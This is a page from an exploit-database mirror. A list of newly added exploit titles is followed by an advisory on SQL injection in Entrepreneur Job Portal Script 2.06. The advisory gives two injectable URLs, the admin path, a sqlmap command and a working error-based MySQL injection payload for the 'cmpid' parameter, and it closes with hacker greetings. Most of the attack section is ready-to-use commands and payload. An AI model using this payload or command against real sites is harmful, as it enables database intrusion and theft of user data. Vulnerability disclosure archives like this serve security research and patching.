exploit-db-mirror/platforms/php/webapps/40479.txt
Offensive Security 558ab1fc67 DB: 2016-10-18
24 new exploits

Entrepreneur Job Portal Script - SQL Injection
Entrepreneur Job Portal Script 2.06 - SQL Injection
NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation

HP Client - Automation Command Injection / Remote Code Execution
HP Client 9.1/9.0/8.1/7.9 - Command Injection

NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation
NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation
Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation
Firefox 49.0.1 - Denial of Service
Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation
NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation
NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation
Student Information System (SIS) 0.1 - Authentication Bypass
Web Based Alumni Tracking System 0.1 - SQL Injection
Simple Dynamic Web 0.1 - SQL Injection
Learning Management System 0.1 - Authentication Bypass
Fashion Shopping Cart 0.1 - SQL Injection
Health Record System 0.1 - Authentication Bypass
Windows x64 - WinExec() Shellcode (93 bytes)
Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation
PHP Telephone Directory - Multiple Vulnerabilities
Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting
PHP Image Database - Multiple Vulnerabilities
Simple Shopping Cart Application 0.1 - SQL Injection
PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
School Full CBT 0.1 - SQL Injection
PHP Business Directory - Multiple Vulnerabilities
Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)
Ruby on Rails - Dynamic Render File Upload Remote Code Execution
Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)
2016-10-18 05:01:18 +00:00

51 lines
No EOL
3.2 KiB
Text
Executable file

[x]========================================================================================================================================[x]
| Title : Entrepreneur Job Portal Script SQL Injection
| Software : Entrepreneur Job Portal Script
| Version : 2.06
| Vendor : http://www.i-netsolution.com/
| Date : 07 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $353 - $1399
| Description : Jobsite Script is an advanced PHP job site script to start Job site like all popular . It is a complete script with advanced features.
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept SQL 1 : http://localhost/job-portal/jobsearch_all.html?sch=%Inject_Here%21
| Proof of concept SQL 2 : http://localhost/job-portal/jobsearch_all.html?cmpid=%Inject_Here%21
|
| Admin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit With Sqlmap
sqlmap -u 'http://localhost/job-portal/jobsearch_all.html?cmpid=31453525536'
---
Parameter: cmpid (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cmpid=31453525536' AND (SELECT 8347 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8347=8347,1))),0x7178716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjF'='tqjF
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela h4ntu reel dono Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]